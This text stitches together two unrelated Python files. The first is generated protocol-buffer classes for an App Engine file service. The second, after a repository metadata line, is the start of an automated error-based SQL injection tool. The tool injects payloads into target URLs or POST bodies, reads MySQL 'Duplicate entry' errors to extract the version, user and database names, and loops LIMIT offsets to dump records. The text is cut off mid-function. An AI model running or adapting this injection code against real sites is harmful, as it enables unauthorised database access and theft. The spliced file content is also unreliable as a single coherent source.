_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetShuffleStatusRequest'
class GetShuffleStatusResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
status_ = 0
has_description_ = 0
description_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def set_status(self, x):
self.has_status_ = 1
self.status_ = x
def clear_status(self):
if self.has_status_:
self.has_status_ = 0
self.status_ = 0
def has_status(self): return self.has_status_
def description(self): return self.description_
def set_description(self, x):
self.has_description_ = 1
self.description_ = x
def clear_description(self):
if self.has_description_:
self.has_description_ = 0
self.description_ = ""
def has_description(self): return self.has_description_
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.set_status(x.status())
if (x.has_description()): self.set_description(x.description())
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
if self.has_description_ != x.has_description_: return 0
if self.has_description_ and self.description_ != x.description_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthVarInt64(self.status_)
if (self.has_description_): n += 1 + self.lengthString(len(self.description_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthVarInt64(self.status_)
if (self.has_description_): n += 1 + self.lengthString(len(self.description_))
return n
def Clear(self):
self.clear_status()
self.clear_description()
def OutputUnchecked(self, out):
out.putVarInt32(8)
out.putVarInt32(self.status_)
if (self.has_description_):
out.putVarInt32(18)
out.putPrefixedString(self.description_)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(8)
out.putVarInt32(self.status_)
if (self.has_description_):
out.putVarInt32(18)
out.putPrefixedString(self.description_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_status(d.getVarInt32())
continue
if tt == 18:
self.set_description(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_: res+=prefix+("status: %s\n" % self.DebugFormatInt32(self.status_))
if self.has_description_: res+=prefix+("description: %s\n" % self.DebugFormatString(self.description_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
kdescription = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
2: "description",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetShuffleStatusResponse'
class GetCapabilitiesRequest(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetCapabilitiesRequest'
class GetCapabilitiesResponse(ProtocolBuffer.ProtocolMessage):
has_shuffle_available_ = 0
shuffle_available_ = 0
def __init__(self, contents=None):
self.filesystem_ = []
if contents is not None: self.MergeFromString(contents)
def filesystem_size(self): return len(self.filesystem_)
def filesystem_list(self): return self.filesystem_
def filesystem(self, i):
return self.filesystem_[i]
def set_filesystem(self, i, x):
self.filesystem_[i] = x
def add_filesystem(self, x):
self.filesystem_.append(x)
def clear_filesystem(self):
self.filesystem_ = []
def shuffle_available(self): return self.shuffle_available_
def set_shuffle_available(self, x):
self.has_shuffle_available_ = 1
self.shuffle_available_ = x
def clear_shuffle_available(self):
if self.has_shuffle_available_:
self.has_shuffle_available_ = 0
self.shuffle_available_ = 0
def has_shuffle_available(self): return self.has_shuffle_available_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.filesystem_size()): self.add_filesystem(x.filesystem(i))
if (x.has_shuffle_available()): self.set_shuffle_available(x.shuffle_available())
def Equals(self, x):
if x is self: return 1
if len(self.filesystem_) != len(x.filesystem_): return 0
for e1, e2 in zip(self.filesystem_, x.filesystem_):
if e1 != e2: return 0
if self.has_shuffle_available_ != x.has_shuffle_available_: return 0
if self.has_shuffle_available_ and self.shuffle_available_ != x.shuffle_available_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_shuffle_available_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: shuffle_available not set.')
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.filesystem_)
for i in xrange(len(self.filesystem_)): n += self.lengthString(len(self.filesystem_[i]))
return n + 2
def ByteSizePartial(self):
n = 0
n += 1 * len(self.filesystem_)
for i in xrange(len(self.filesystem_)): n += self.lengthString(len(self.filesystem_[i]))
if (self.has_shuffle_available_):
n += 2
return n
def Clear(self):
self.clear_filesystem()
self.clear_shuffle_available()
def OutputUnchecked(self, out):
for i in xrange(len(self.filesystem_)):
out.putVarInt32(10)
out.putPrefixedString(self.filesystem_[i])
out.putVarInt32(16)
out.putBoolean(self.shuffle_available_)
def OutputPartial(self, out):
for i in xrange(len(self.filesystem_)):
out.putVarInt32(10)
out.putPrefixedString(self.filesystem_[i])
if (self.has_shuffle_available_):
out.putVarInt32(16)
out.putBoolean(self.shuffle_available_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_filesystem(d.getPrefixedString())
continue
if tt == 16:
self.set_shuffle_available(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.filesystem_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("filesystem%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
if self.has_shuffle_available_: res+=prefix+("shuffle_available: %s\n" % self.DebugFormatBool(self.shuffle_available_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilesystem = 1
kshuffle_available = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filesystem",
2: "shuffle_available",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetCapabilitiesResponse'
class FinalizeRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
return n
def Clear(self):
self.clear_filename()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FinalizeRequest'
class FinalizeResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FinalizeResponse'
class GetDefaultGsBucketNameRequest(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetDefaultGsBucketNameRequest'
class GetDefaultGsBucketNameResponse(ProtocolBuffer.ProtocolMessage):
has_default_gs_bucket_name_ = 0
default_gs_bucket_name_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def default_gs_bucket_name(self): return self.default_gs_bucket_name_
def set_default_gs_bucket_name(self, x):
self.has_default_gs_bucket_name_ = 1
self.default_gs_bucket_name_ = x
def clear_default_gs_bucket_name(self):
if self.has_default_gs_bucket_name_:
self.has_default_gs_bucket_name_ = 0
self.default_gs_bucket_name_ = ""
def has_default_gs_bucket_name(self): return self.has_default_gs_bucket_name_
def MergeFrom(self, x):
assert x is not self
if (x.has_default_gs_bucket_name()): self.set_default_gs_bucket_name(x.default_gs_bucket_name())
def Equals(self, x):
if x is self: return 1
if self.has_default_gs_bucket_name_ != x.has_default_gs_bucket_name_: return 0
if self.has_default_gs_bucket_name_ and self.default_gs_bucket_name_ != x.default_gs_bucket_name_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_default_gs_bucket_name_): n += 1 + self.lengthString(len(self.default_gs_bucket_name_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_default_gs_bucket_name_): n += 1 + self.lengthString(len(self.default_gs_bucket_name_))
return n
def Clear(self):
self.clear_default_gs_bucket_name()
def OutputUnchecked(self, out):
if (self.has_default_gs_bucket_name_):
out.putVarInt32(10)
out.putPrefixedString(self.default_gs_bucket_name_)
def OutputPartial(self, out):
if (self.has_default_gs_bucket_name_):
out.putVarInt32(10)
out.putPrefixedString(self.default_gs_bucket_name_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_default_gs_bucket_name(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_default_gs_bucket_name_: res+=prefix+("default_gs_bucket_name: %s\n" % self.DebugFormatString(self.default_gs_bucket_name_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdefault_gs_bucket_name = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "default_gs_bucket_name",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetDefaultGsBucketNameResponse'
class ListDirRequest(ProtocolBuffer.ProtocolMessage):
has_path_ = 0
path_ = ""
has_marker_ = 0
marker_ = ""
has_max_keys_ = 0
max_keys_ = 0
has_prefix_ = 0
prefix_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def path(self): return self.path_
def set_path(self, x):
self.has_path_ = 1
self.path_ = x
def clear_path(self):
if self.has_path_:
self.has_path_ = 0
self.path_ = ""
def has_path(self): return self.has_path_
def marker(self): return self.marker_
def set_marker(self, x):
self.has_marker_ = 1
self.marker_ = x
def clear_marker(self):
if self.has_marker_:
self.has_marker_ = 0
self.marker_ = ""
def has_marker(self): return self.has_marker_
def max_keys(self): return self.max_keys_
def set_max_keys(self, x):
self.has_max_keys_ = 1
self.max_keys_ = x
def clear_max_keys(self):
if self.has_max_keys_:
self.has_max_keys_ = 0
self.max_keys_ = 0
def has_max_keys(self): return self.has_max_keys_
def prefix(self): return self.prefix_
def set_prefix(self, x):
self.has_prefix_ = 1
self.prefix_ = x
def clear_prefix(self):
if self.has_prefix_:
self.has_prefix_ = 0
self.prefix_ = ""
def has_prefix(self): return self.has_prefix_
def MergeFrom(self, x):
assert x is not self
if (x.has_path()): self.set_path(x.path())
if (x.has_marker()): self.set_marker(x.marker())
if (x.has_max_keys()): self.set_max_keys(x.max_keys())
if (x.has_prefix()): self.set_prefix(x.prefix())
def Equals(self, x):
if x is self: return 1
if self.has_path_ != x.has_path_: return 0
if self.has_path_ and self.path_ != x.path_: return 0
if self.has_marker_ != x.has_marker_: return 0
if self.has_marker_ and self.marker_ != x.marker_: return 0
if self.has_max_keys_ != x.has_max_keys_: return 0
if self.has_max_keys_ and self.max_keys_ != x.max_keys_: return 0
if self.has_prefix_ != x.has_prefix_: return 0
if self.has_prefix_ and self.prefix_ != x.prefix_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_path_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: path not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.path_))
if (self.has_marker_): n += 1 + self.lengthString(len(self.marker_))
if (self.has_max_keys_): n += 1 + self.lengthVarInt64(self.max_keys_)
if (self.has_prefix_): n += 1 + self.lengthString(len(self.prefix_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_path_):
n += 1
n += self.lengthString(len(self.path_))
if (self.has_marker_): n += 1 + self.lengthString(len(self.marker_))
if (self.has_max_keys_): n += 1 + self.lengthVarInt64(self.max_keys_)
if (self.has_prefix_): n += 1 + self.lengthString(len(self.prefix_))
return n
def Clear(self):
self.clear_path()
self.clear_marker()
self.clear_max_keys()
self.clear_prefix()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.path_)
if (self.has_marker_):
out.putVarInt32(18)
out.putPrefixedString(self.marker_)
if (self.has_max_keys_):
out.putVarInt32(24)
out.putVarInt64(self.max_keys_)
if (self.has_prefix_):
out.putVarInt32(34)
out.putPrefixedString(self.prefix_)
def OutputPartial(self, out):
if (self.has_path_):
out.putVarInt32(10)
out.putPrefixedString(self.path_)
if (self.has_marker_):
out.putVarInt32(18)
out.putPrefixedString(self.marker_)
if (self.has_max_keys_):
out.putVarInt32(24)
out.putVarInt64(self.max_keys_)
if (self.has_prefix_):
out.putVarInt32(34)
out.putPrefixedString(self.prefix_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_path(d.getPrefixedString())
continue
if tt == 18:
self.set_marker(d.getPrefixedString())
continue
if tt == 24:
self.set_max_keys(d.getVarInt64())
continue
if tt == 34:
self.set_prefix(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_path_: res+=prefix+("path: %s\n" % self.DebugFormatString(self.path_))
if self.has_marker_: res+=prefix+("marker: %s\n" % self.DebugFormatString(self.marker_))
if self.has_max_keys_: res+=prefix+("max_keys: %s\n" % self.DebugFormatInt64(self.max_keys_))
if self.has_prefix_: res+=prefix+("prefix: %s\n" % self.DebugFormatString(self.prefix_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kpath = 1
kmarker = 2
kmax_keys = 3
kprefix = 4
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "path",
2: "marker",
3: "max_keys",
4: "prefix",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.STRING,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ListDirRequest'
class ListDirResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.filenames_ = []
if contents is not None: self.MergeFromString(contents)
def filenames_size(self): return len(self.filenames_)
def filenames_list(self): return self.filenames_
def filenames(self, i):
return self.filenames_[i]
def set_filenames(self, i, x):
self.filenames_[i] = x
def add_filenames(self, x):
self.filenames_.append(x)
def clear_filenames(self):
self.filenames_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.filenames_size()): self.add_filenames(x.filenames(i))
def Equals(self, x):
if x is self: return 1
if len(self.filenames_) != len(x.filenames_): return 0
for e1, e2 in zip(self.filenames_, x.filenames_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.filenames_)
for i in xrange(len(self.filenames_)): n += self.lengthString(len(self.filenames_[i]))
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.filenames_)
for i in xrange(len(self.filenames_)): n += self.lengthString(len(self.filenames_[i]))
return n
def Clear(self):
self.clear_filenames()
def OutputUnchecked(self, out):
for i in xrange(len(self.filenames_)):
out.putVarInt32(10)
out.putPrefixedString(self.filenames_[i])
def OutputPartial(self, out):
for i in xrange(len(self.filenames_)):
out.putVarInt32(10)
out.putPrefixedString(self.filenames_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_filenames(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.filenames_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("filenames%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilenames = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filenames",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ListDirResponse'
if _extension_runtime:
pass
__all__ = ['FileServiceErrors','KeyValue','KeyValues','FileContentType','CreateRequest_Parameter','CreateRequest','CreateResponse','OpenRequest','OpenResponse','CloseRequest','CloseResponse','FileStat','StatRequest','StatResponse','AppendRequest','AppendResponse','DeleteRequest','DeleteResponse','ReadRequest','ReadResponse','ReadKeyValueRequest','ReadKeyValueResponse_KeyValue','ReadKeyValueResponse','ShuffleEnums','ShuffleInputSpecification','ShuffleOutputSpecification','ShuffleRequest_Callback','ShuffleRequest','ShuffleResponse','GetShuffleStatusRequest','GetShuffleStatusResponse','GetCapabilitiesRequest','GetCapabilitiesResponse','FinalizeRequest','FinalizeResponse','GetDefaultGsBucketNameRequest','GetDefaultGsBucketNameResponse','ListDirRequest','ListDirResponse']
| bsd-3-clause | 3,129,811,020,666,528,000 | 26.029385 | 777 | 0.638449 | false |
hackersql/sq1map | Web/xpath_injection/Xpath/Xtract/_Error.py | 1 | 81246 | #!/usr/bin/python
#######################################################
# Xpath tool v2.0 - Automated Xpath Sql Injection #
# Author: Nasir khan (r0ot h3x49) #
#######################################################
import os, re
from Payload.ErrorPayloads import *
from _compat import (
compat_request,
compat_urlerr,
compat_urlopen,
compat_httperr,
compat_urlparse,
compat_opener,
compat_prettytable,
compat_timer,
compat_strftime,
compat_sleep,
compat_get,
compat_post,
user_agent_win,
user_agent_unix,
compat_color,
compat_product,
user_agent_default,
compat_user,
compat_exist,
compat_session,
compat_cursor,
compat_writer,
compat_timeout,
)
sqlite = compat_session()
class ErrorBasedSQLi:
def __init__(self, url, data=None, timeout=None):
self._url = url
self._data = data
# Creating session making script to execute session
self._session = False
self._timeout = timeout
# Files and directories to Create
self._LFile = 'log'
self._dirXpath = '.Xpath'
self._dirOutput = 'output'
self._PFile = 'target.txt'
self._SFile = 'session.sqlite'
self._target = (compat_urlparse(self._url)).netloc
# Global paths to the Session, logs, and payload file
self._PathSession = ''
self._PathLogs = ''
self._PathPloads = ''
self._tgt = ''
self._PathDbdump = ''
self._dbdirectory = ''
# Database Columns to alter the table
# Table Name
self.tblSession = "`tblSession`"
# Column Name
self.colPrm = "`Param` TEXT"
self.colTyp = "`Type` TEXT"
self.colTit = "`Title` TEXT"
self.colPld = "`Payload` TEXT"
self.colCdb = "`Database` TEXT"
self.colVer = "`Version` TEXT"
self.colUsr = "`User` TEXT"
self.colHst = "`Host` TEXT"
self.tblPayload = "`tblPayload`"
self.colDbp = "`PayloadDbs` TEXT"
self.colTbp = "`PayloadTbls` TEXT"
self.colClp = "`PayloadCols` TEXT"
self.colDtp = "`PayloadDump` TEXT"
self.colDbc = "`DbsCount` TEXT"
self.colDbs = "`DbsNames` TEXT"
# Logs to save:
self._logs = ""
def PathToSave(self):
if os.name == 'posix':
path = compat_user("~")
Xpath = str(path) + "/" + str(self._dirXpath)
Output = str(Xpath) + "/" + str(self._dirOutput)
target = str(Output) + "/" + str(self._target)
self._tgt = target
log = str(target) + "/" + str(self._LFile)
plod = str(target) + "/" + str(self._PFile)
if compat_exist(path):
try:
os.makedirs(target)
except Exception as e:
pass
if compat_exist(target):
logs = open(str(log), "a")
plods = open(str(plod), "a")
logs.close()
plods.close()
self._PathLogs = log
self._PathPloads = plod
else:
path = os.environ["USERPROFILE"]
Xpath = str(path) + "\\" + str(self._dirXpath)
Output = str(Xpath) + "\\" + str(self._dirOutput)
target = str(Output) + "\\" + str(self._target)
self._tgt = target
log = str(target) + "\\" + str(self._LFile)
plod = str(target) + "\\" + str(self._PFile)
if compat_exist(path):
try:
os.makedirs(target)
except Exception as e:
pass
if compat_exist(target):
logs = open(str(log), "a")
plods = open(str(plod), "a")
logs.close()
plods.close()
self._PathLogs = log
self._PathPloads = plod
def XpathBasic(self, tgt, Table, Col, Name=None, Payloads=None):
_colAlter = Col
_tableSession = Table
Query_Test = False
if self._url and not self._data:
for QueryIndex in Payloads:
if not Query_Test:
QueryToTest = ('%s' % QueryIndex)
if '0x72306f74' in tgt:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
Query_Test = True
banner = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
if not self._session:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlter)
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (banner)
print compat_color.fg + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
print compat_color.fg + compat_color.sb + "%s: '%s'" % (Name, banner)
self._logs += "back-end DBMS: MySQL >= 5.1\n"
self._logs += "%s: %s\n\n" % (Name, banner)
_data = "'%s'" % (banner)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlter).replace(" TEXT",""), Data=_data)
if Query_Test:
# Writing the logs to logs file
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
# cleaning logs
self._logs = ""
break
elif self._url and self._data:
for QueryIndex in Payloads:
if not Query_Test:
QueryToTest = ('%s' % QueryIndex)
if '0x72306f74' in tgt:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(self._url, data=FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
Query_Test = True
banner = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
if not self._session:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlter)
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (banner)
print compat_color.fg + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
print compat_color.fg + compat_color.sb + "%s: '%s'" % (Name, banner)
self._logs += "back-end DBMS: MySQL >= 5.1\n"
self._logs += "%s: %s\n\n" % (Name, banner)
_data = "'%s'" % (banner)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlter).replace(" TEXT",""), Data=_data)
if Query_Test:
# Writing the logs to logs file
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
# cleaning logs
self._logs = ""
break
def XpathDump(self, init, total, _payload):
# list for saving dumps
_dlist = []
_dumped = total
if self._url and not self._data:
# Itering through the no of data
for itr in range(init, total):
# setting payload
if 'LIMIT/**_**/0' in _payload:
_dbsQuery = _payload.replace('LIMIT/**_**/0','LIMIT/**_**/%d' % (itr))
elif 'LIMIT%200' in _payload:
_dbsQuery = _payload.replace('LIMIT%200','LIMIT%%20%d' % (itr))
else:
_dbsQuery = _payload.replace('LIMIT+0','LIMIT+%d' % (itr))
try:
req = compat_request(_dbsQuery, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
except KeyboardInterrupt as e:
_clean = ','.join(map(str, _dlist))
return _clean, _payload, _dlist, _dumped
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
_dbn = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (_dbn)
_dlist.append(_dbn)
_clean = ','.join(map(str, _dlist))
return _clean, _payload, _dlist, _dumped
elif self._url and self._data:
for itr in range(init, total):
# setting payload
if 'LIMIT/**_**/0' in _payload:
_dbsQuery = _payload.replace('LIMIT/**_**/0','LIMIT/**_**/%d' % (itr))
elif 'LIMIT%200' in _payload:
